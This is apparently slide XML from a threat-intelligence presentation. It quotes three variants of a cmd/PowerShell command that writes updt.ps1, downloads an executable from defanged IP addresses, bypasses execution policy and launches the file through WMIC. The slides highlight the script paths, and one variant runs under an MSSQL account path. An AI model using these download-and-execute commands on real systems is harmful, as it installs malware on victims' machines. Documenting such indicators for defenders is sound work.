                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3431223-91A5-4B4E-7F4B-CBB995DF7D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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE93032-E6E9-4515-A0EF-7D2DBC75BB5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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC069585-B60F-7747-C522-E4FBDED248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78127" y="-67586"/>
            <a:ext cx="13425772" cy="10189508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="122" name="Group 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26D71FD9-6533-77BB-102B-99D185728490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="1953783"/>
            <a:ext cx="16459200" cy="3185521"/>
            <a:chOff x="914400" y="2120365"/>
            <a:chExt cx="16459200" cy="3185521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E99C156-F601-85B6-F1A9-53660F195D9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="2120365"/>
              <a:ext cx="16459200" cy="3185521"/>
              <a:chOff x="9783551" y="1103017"/>
              <a:chExt cx="16459200" cy="3185521"/>
            </a:xfrm>
          </p:grpSpPr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B280209A-AFB7-F2C2-23FB-7F58E042BB70}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103017"/>
                <a:ext cx="16459200" cy="3185521"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Graphic 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{008E8001-79C7-8A85-23D8-EEC0E308BF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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E9B8D65-5CC6-1DBA-43D9-E84261404AC8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1818602"/>
                <a:ext cx="16134415" cy="2395843"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pP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%SYSTEM%\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a: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”C:\Windows\\System32\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a: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” /C echo $cl = New-Object </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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System.Net.WebClient</a:t>
                </a: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&gt;C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; echo $</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cl.DownloadFile</a:t>
                </a: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(“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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hxxp</a:t>
                </a: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://80.66.75[.]47/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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Dxccaejs.exe</a:t>
                </a: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”, ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a: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”) &gt;&gt; C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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powershell</a:t>
                </a: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–</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ExecutionPolicy</a:t>
                </a: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Bypass C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; WMIC process call create ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="65000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>tzt.bat</a:t>
                </a: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”</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41384656-3757-BC7C-415B-D978EDC00525}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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2D698DA-6CDF-65A6-3F30-C83F2B8E28CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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28727EDB-7CEF-A2BF-56D1-9CF4FFF3BCEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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14" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51533532-40F4-3F18-D51C-28A1C31B4837}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928227" y="1888978"/>
              <a:ext cx="7279854" cy="2477128"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pP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/C echo $cl = New-Object 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System.Net.WebClient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&gt;%TEMP%\updt.ps1 &amp; echo $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cl.DownloadFile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(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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hXXp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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>://80[.]66.75]]]].40/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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXXX.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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, 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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xxxx.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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) &gt;&gt; %TEMP%\updt.ps1 &amp; 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powershell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-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ExecutionPolicy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Bypass %TEMP%\updt.ps1 &amp; WMIC process call create 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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXX.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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0DA5193-6991-CD51-41D1-535F56EB907F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9412357" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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7215F616-34BF-F111-186D-4B4AED460CE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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20" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F12451FC-4901-F7BE-9181-F9B0C7B16B03}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928226" y="2068146"/>
              <a:ext cx="7746993" cy="2551461"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1811382">
                <a:defRPr/>
              </a:pP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"\"C:\\Windows\\\\System32\\\\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cmd.exe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\" /C echo $cl = New-Object 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System.Net.WebClient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&gt; C:\Users\MSSQLS~1\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AppData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\Local\Temp\updt.ps1 &amp; echo $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cl.DownloadFile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(\"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hxxp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://80.66.75[.]36/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aRX.exe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\", \"C:\Users\MSSQLS~1\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AppData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\Local\Temp\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tzt.exe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\") &gt;&gt; %TEMP%\\updt.ps1 &amp; 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powershell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-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ExecutionPolicy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Bypass C:\Users\MSSQLS~1\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AppData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\Local\Temp\updt.ps1 &amp; WMIC process call create \"C:\Users\MSSQLS~1\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AppData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\Local\Temp\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tzt.exe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\""</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{854D42CE-29FB-9C25-0DEF-F8AD7381AF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823503" y="5840056"/>
            <a:ext cx="2004062" cy="368563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E7BA01D9-DA94-7B2A-CC4C-8D8BA6A31C4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322317" y="5808437"/>
            <a:ext cx="2286000" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E9063D9-5C95-1AE0-0580-44B7C72BE152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9608007" y="7803131"/>
            <a:ext cx="2560373" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-GB" sz="20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%TEMP%\\updt.ps1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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26" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFE79CD-05B8-463C-5483-B4F93B9ED30E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733412" y="3985784"/>
            <a:ext cx="3961710" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern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ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern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\\updt.ps1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="240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5" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05D22D8C-CAE0-EE6D-2A1F-7584C02E9640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5606896" y="7289377"/>
            <a:ext cx="2374203" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-GB" sz="20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%TEMP%\updt.ps1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3563206" y="320276"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="42" name="Group 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="43" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Oval 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1353622" y="670136"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
